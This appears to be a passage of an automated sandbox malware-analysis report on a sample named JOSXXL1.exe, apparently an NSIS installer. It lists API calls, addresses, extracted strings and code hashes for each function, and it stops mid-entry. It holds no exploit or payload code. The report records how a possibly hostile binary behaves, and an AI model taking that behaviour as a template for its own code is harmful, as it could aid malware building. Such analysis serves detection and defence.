                                                                                                        • Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
                                                                                                        • Opcode Fuzzy Hash: 6f4a503913ef8ebb725cac2aff158102153f5ef9f377251618bd95ec040e3a6b
                                                                                                        • Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
                                                                                                        • GetMessagePos.USER32 ref: 00404BCF
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00404BE9
                                                                                                        • SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
                                                                                                        • SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Message$Send$ClientScreen
                                                                                                        • String ID: f
                                                                                                        • API String ID: 41195575-1993550816
                                                                                                        • Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                        • Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
                                                                                                        • Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
                                                                                                        • Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4
                                                                                                        APIs
                                                                                                        • GetDC.USER32(?), ref: 00401D59
                                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
                                                                                                        • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
                                                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401D86
                                                                                                        • CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                                                        • String ID: Times New Roman
                                                                                                        • API String ID: 3808545654-927190056
                                                                                                        • Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                        • Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
                                                                                                        • Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
                                                                                                        • Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD
                                                                                                        APIs
                                                                                                        • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
                                                                                                        • wsprintfW.USER32 ref: 00402D56
                                                                                                        • SetWindowTextW.USER32(?,?), ref: 00402D66
                                                                                                        • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Text$ItemTimerWindowwsprintf
                                                                                                        • String ID: unpacking data: %d%%$verifying installer: %d%%
                                                                                                        • API String ID: 1451636040-1158693248
                                                                                                        • Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                        • Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
                                                                                                        • Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
                                                                                                        • Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59
                                                                                                        APIs
                                                                                                          • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10002572
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100025AD
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$Free$Alloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1780285237-0
                                                                                                        • Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                        • Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
                                                                                                        • Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
                                                                                                        • Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
                                                                                                        • GlobalFree.KERNEL32(?), ref: 004028E9
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 004028FC
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00402914
                                                                                                        • DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Global$AllocFree$CloseDeleteFileHandle
                                                                                                        • String ID:
                                                                                                        • API String ID: 2667972263-0
                                                                                                        • Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                        • Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
                                                                                                        • Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
                                                                                                        • Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
                                                                                                        • wsprintfW.USER32 ref: 00404B48
                                                                                                        • SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                                                        • String ID: %u.%u%s%s$H7B
                                                                                                        • API String ID: 3540041739-107966168
                                                                                                        • Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                        • Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
                                                                                                        • Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
                                                                                                        • Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000400,?,?,00000021), ref: 00402583
                                                                                                        • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nstA69B.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000400,?,?,00000021), ref: 0040258E
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharMultiWidelstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\nstA69B.tmp$C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll
                                                                                                        • API String ID: 3109718747-3777108490
                                                                                                        • Opcode ID: 3ab53c3933776d76c7f2c2ac7c1e0b1a1d8adc62f327ac9952a723d0079f359d
                                                                                                        • Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
                                                                                                        • Opcode Fuzzy Hash: 3ab53c3933776d76c7f2c2ac7c1e0b1a1d8adc62f327ac9952a723d0079f359d
                                                                                                        • Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: FreeGlobal
                                                                                                        • String ID:
                                                                                                        • API String ID: 2979337801-0
                                                                                                        • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                        • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                                                                        • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                                                                        • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                                                                        APIs
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                                                                        • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                                                                        • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2337909771.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.2337832913.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2337963642.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        • Associated: 00000000.00000002.2338036438.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_10000000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1148316912-0
                                                                                                        • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                        • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                                                                        • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                                                                        • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                                                                        APIs
                                                                                                        • GetDlgItem.USER32(?,?), ref: 00401D00
                                                                                                        • GetClientRect.USER32(00000000,?), ref: 00401D0D
                                                                                                        • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
                                                                                                        • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
                                                                                                        • DeleteObject.GDI32(00000000), ref: 00401D4B
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 1849352358-0
                                                                                                        • Opcode ID: 7b3c78611eb50acad670062cf6797ddfdf95dba70f5aba5ea4f5b4857e7d98af
                                                                                                        • Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
                                                                                                        • Opcode Fuzzy Hash: 7b3c78611eb50acad670062cf6797ddfdf95dba70f5aba5ea4f5b4857e7d98af
                                                                                                        • Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38
                                                                                                        APIs
                                                                                                        • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
                                                                                                        • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$Timeout
                                                                                                        • String ID: !
                                                                                                        • API String ID: 1777923405-2657877971
                                                                                                        • Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                        • Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
                                                                                                        • Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
                                                                                                        • Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769
                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,00000002,Call,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040607A
                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 0040609B
                                                                                                        • RegCloseKey.ADVAPI32(?,?,004062C3,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 004060BE
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                        • String ID: Call
                                                                                                        • API String ID: 3677997916-1824292864
                                                                                                        • Opcode ID: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                        • Instruction ID: dd2034eab93442e05d5faf4c8c2bb259ab57cbcddbd304a2a07cf8a1e20057b8
                                                                                                        • Opcode Fuzzy Hash: dc8238eba50b6a515ffb3eaa529f07d06f955d85da5af348ba8f56d7e8cd44ce
                                                                                                        • Instruction Fuzzy Hash: 00015A3119020AEACF21CF26ED08EDB3BACEF44350F01403AF945D2260D735D968CBA6
                                                                                                        APIs
                                                                                                        • CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,74DF3420,?,74DF2EE0,00405994,?,74DF3420,74DF2EE0,"C:\Users\user\Desktop\JOSXXL1.exe"), ref: 00405BF0
                                                                                                        • CharNextW.USER32(00000000), ref: 00405BF5
                                                                                                        • CharNextW.USER32(00000000), ref: 00405C0D
                                                                                                        Strings
                                                                                                        • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharNext
                                                                                                        • String ID: Error writing temporary file. Make sure your temp folder is valid.
                                                                                                        • API String ID: 3213498283-4064111799
                                                                                                        • Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                        • Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
                                                                                                        • Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
                                                                                                        • Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B3D
                                                                                                        • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B47
                                                                                                        • lstrcatW.KERNEL32(?,0040A014), ref: 00405B59
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B37
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrcatlstrlen
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                        • API String ID: 2659869361-3081826266
                                                                                                        • Opcode ID: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                        • Instruction ID: 377234fc647d40db67a969affeec1c2d2c00c7240f2da489af686c3f2ce23dc9
                                                                                                        • Opcode Fuzzy Hash: 69ce20dac70bd98cff0fbc611a97eee619d910519d07cd3d76554ab653056bec
                                                                                                        • Instruction Fuzzy Hash: E1D05E711019246AC1117B448D04DDB63ACAE45300341046EF202B70A6C778695286FD
                                                                                                        APIs
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
                                                                                                          • Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
                                                                                                          • Part of subcall function 004052E2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00402E19,00402E19,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,00000000,00000000,00000000), ref: 0040533D
                                                                                                          • Part of subcall function 004052E2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nstA69B.tmp\System.dll), ref: 0040534F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
                                                                                                          • Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D
                                                                                                          • Part of subcall function 00405863: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                          • Part of subcall function 00405863: CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E95
                                                                                                        • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401EAA
                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EB7
                                                                                                        • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EDE
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                        • String ID:
                                                                                                        • API String ID: 3585118688-0
                                                                                                        • Opcode ID: 96e303a2e1a9cb485544aac6f60866d861ea88a023a06f5ccfe1ffd58367aca0
                                                                                                        • Instruction ID: 6eadcb4e995b32aeec71f8dd92363e70dac4c12fa3ca33f02f681fc447c81ee3
                                                                                                        • Opcode Fuzzy Hash: 96e303a2e1a9cb485544aac6f60866d861ea88a023a06f5ccfe1ffd58367aca0
                                                                                                        • Instruction Fuzzy Hash: AE11C831900508EBCF21AFA1CD8499E7B76EF44314F24407BF501B61E1D7798A92DB9D
                                                                                                        APIs
                                                                                                        • CloseHandle.KERNEL32(000002BC,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 004038EC
                                                                                                        • CloseHandle.KERNEL32(000002B4,C:\Users\user\AppData\Local\Temp\,0040370C,?), ref: 00403900
                                                                                                        Strings
                                                                                                        • C:\Users\user\AppData\Local\Temp\nstA69B.tmp, xrefs: 00403910
                                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseHandle
                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nstA69B.tmp
                                                                                                        • API String ID: 2962429428-3809703559
                                                                                                        • Opcode ID: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                        • Instruction ID: de49926bb72e77a98f9c5ce19ed8b4a608a10c25b77e0dec4f49a46a5066bf07
                                                                                                        • Opcode Fuzzy Hash: 818760232e500ac014ecc4659e20c47a416318d98e4cd696d1546b419abd0e17
                                                                                                        • Instruction Fuzzy Hash: E2E086B140071896C5246F7CAD4D9953A185F453357244326F078F60F0C7789A675A99
                                                                                                        APIs
                                                                                                        • IsWindowVisible.USER32(?), ref: 00405285
                                                                                                        • CallWindowProcW.USER32(?,?,?,?), ref: 004052D6
                                                                                                          • Part of subcall function 00404293: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A5
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                                                        • String ID:
                                                                                                        • API String ID: 3748168415-3916222277
                                                                                                        • Opcode ID: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                        • Instruction ID: e2cad66c9b02384d3be1b0302d87088ec840166322e374313d6fbb5223fafa3d
                                                                                                        • Opcode Fuzzy Hash: 56cab98530d4ff4408cd9c369303e271687e5fa7c90705031ed2c8dc290fa65f
                                                                                                        • Instruction Fuzzy Hash: 5D01B1B1210709AFEF208F51DD80A6B3B35EF85361F10813BFA00761D1C77A9C529E29
                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426750,Error launching installer), ref: 0040588C
                                                                                                        • CloseHandle.KERNEL32(0040A230), ref: 00405899
                                                                                                        Strings
                                                                                                        • Error launching installer, xrefs: 00405876
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreateHandleProcess
                                                                                                        • String ID: Error launching installer
                                                                                                        • API String ID: 3712363035-66219284
                                                                                                        • Opcode ID: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                        • Instruction ID: c820723d4e94d220d757831b92c48145409d5a390a225df4cf368edf7247e646
                                                                                                        • Opcode Fuzzy Hash: acebcc260901bb8c7477aeb1107a61866cbc161fdefa27c2bb5441bedb54154a
                                                                                                        • Instruction Fuzzy Hash: 22E046B4600209BFEB10AB60ED49F7B7BADEB04348F408431BD00F2190D778A8148A78
                                                                                                        APIs
                                                                                                        • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\JOSXXL1.exe,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405B89
                                                                                                        • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402EAD,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\JOSXXL1.exe,C:\Users\user\Desktop\JOSXXL1.exe,80000000,00000003), ref: 00405B99
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2317523792.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_JOSXXL1.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CharPrevlstrlen
                                                                                                        • String ID: C:\Users\user\Desktop
                                                                                                        • API String ID: 2709904686-224404859
                                                                                                        • Opcode ID: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                        • Instruction ID: 9a844447357a9703a2937c3aa74ac44ffd17116a21dd7a3b54c6405c44ad0d39
                                                                                                        • Opcode Fuzzy Hash: 2f3bd6b78df313aedfed625dab12a62b748c0839e8540faa9dae91e8a46bacba
                                                                                                        • Instruction Fuzzy Hash: 86D05EB2401D209AD3226B08DC01D9F73ACEF1130174A486AE441A61A5D7787D808AA8
                                                                                                        APIs
                                                                                                        • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                        • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                        • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                        Memory Dump Source
